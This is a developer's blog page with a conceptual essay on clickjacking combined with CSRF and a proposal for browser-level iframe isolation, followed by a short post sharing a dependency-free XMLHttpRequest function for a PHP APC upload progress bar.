The recent click jacking attacks on Twitter have been rather popular in the social media realm these past few weeks (read more at Jeff Jones's blog, or Chris Shiflett's), and tragically this is likely only the tip of the ice berg. The attack works so well because Twitter allows you to pre-populate a message in the text area via the address, but has CSRF protection on the submission itself. Your browser, having obligingly rendered the page (despite possibly not being able to see it) received the CSRF token, the server held onto it’s copy, when you click the button, willingly or not, the submission is accepted.

I say tip of the iceberg because I believe this is only the first generation of attacks. The second generation likely isn’t very far off. Many sites are vulnerable (in part) to traditional CSRF attacks, Amazon.com had an outstanding CSRF vulnerability for quite a while. They rely on a few specific pages (such as the checkout page, or a confirmation page) to be invulnerable to attack to defend their site as a whole (ignoring ‘lesser’ vulnerabilities, concentrating on a few key choke points). Consider a two stage attack, the first leveraging existing CSRF vulnerabilities, the second using Clickjacking to circumvent the defended pages, and voila! the whole thing comes crumbling down. I will mention that in this case Amazon may be safe, while Clickjacking does bypass many transparent CSRF defenses, re-authentication remains safe and effective.


While we have seen several iterative levels of defense from different sites, I actually place much of the blame (and onus of resolving the problem) on the browser itself. While I like iFrames in several circumstances, I really feel they fall into a special place when it comes to the same domain policy. Currently they are treated in the same manner as a page requested directly through the address bar. They can reference external resources, access previously set cookies, create new ones.

I feel they are children of the page in which they are placed, and should inherit their state from there. So if a user loads a page from evil.example.org, which embeds an iFrame sourcing from Facebook.com it effectively represents a fresh browser. Cookies present from earlier direct browsing of Facebook are unavailable, by the same note any cookies sent to the embedded iFrame version will be destroyed after the user navigates away from that page. The same domain policy exists as before, but the presence of an iFrame now truly represents an island, independent from all others.

This does a tremendous amount of work to destroy the attacks we’re now seeing, and the ones to come in the future. It becomes impossible to inherit state into an attacking page. Care must of course be taken to ensure that layered technologies (such as Flash or Silverlight) don’t provide a work around to this defense. While I do see this causing possible issues for advertisers (who routinely embed content, and hit you with cookies),

I’d be interested in more critical ways it would interfere with what we’re doing now.

note: I’d also like web browsers and web servers to work together a bit more on the CSRF issue. When requesting a document as referenced by an <img> tag, they should demand a response with a mime type of image/*. They don’t, by and large they indicate a preference of an image, but a willingness to accept */*, which is useless, as any other mimetype is generally rendered as a broken image. Most webservers are also at fault, since they obligingly and knowingly serve content such as text/plain or text/html to a client that demanded something of type image/*.
On my #secretProject (#wmps) we need a file upload progress meter, and I'd rather not use one of the flash based solutions (that are apparently breaking like heck under Flash 10). There's a couple tutorials out there demonstrating this, Rasmus', as well as a great one at IBM. My issue was both was that they were using Ajax libraries (it's kind of hidden in the IBM one, it ends up relying on some functionality from Google Maps that I don't really understand).

Anyways, go read the IBM one, then substitute in this function and you've got a non-internet explorer ajax upload meter, with no external dependencies. Remember you need APC with the RFC 1387 option enabled.

If you need hints on making this cross browser (I'm presenting a stripped down example on purpose) take a look at the great info in the Mozilla Ajax Series

Code after the jump:


?function getProgress(){

//GDownloadUrl("getprogress.php?progress_key=",
// function(percent, responseCode) {
// document.getElementById("progressinner").style.width = percent+"%";
// if (percent < 100){
// setTimeout("getProgress()", 100);
// }
// });

httpRequest = new XMLHttpRequest();
httpRequest.open('GET', 'getprogress.php?progress_key=<?php echo($id)?>');
httpRequest.onreadystatechange = function()
{
if (httpRequest.readyState == 4)
{
var response = httpRequest.responseText;
document.getElementById("progressinner").style.width = response+"%";
document.getElementById("progressinner").innerHTML = response+"%";
console.log(response);
if (response < 100)
{
setTimeout("getProgress()", 5000); //Update bar every 5 seconds. Apropriate for really freaking huge uploads
}

}
}
httpRequest.send(null);


}

Hi, I’m Paul Reinheimer, a developer working on the web.

I co-founded WonderProxy which provides access to over 200 proxies around the world to enable testing of geoip sensitive applications. We've since expanded to offer more granular tooling through Where's it Up

My hobbies are cycling, photography, travel, and engaging Allison Moore in intelligent discourse. I frequently write about PHP and other related technologies.

Search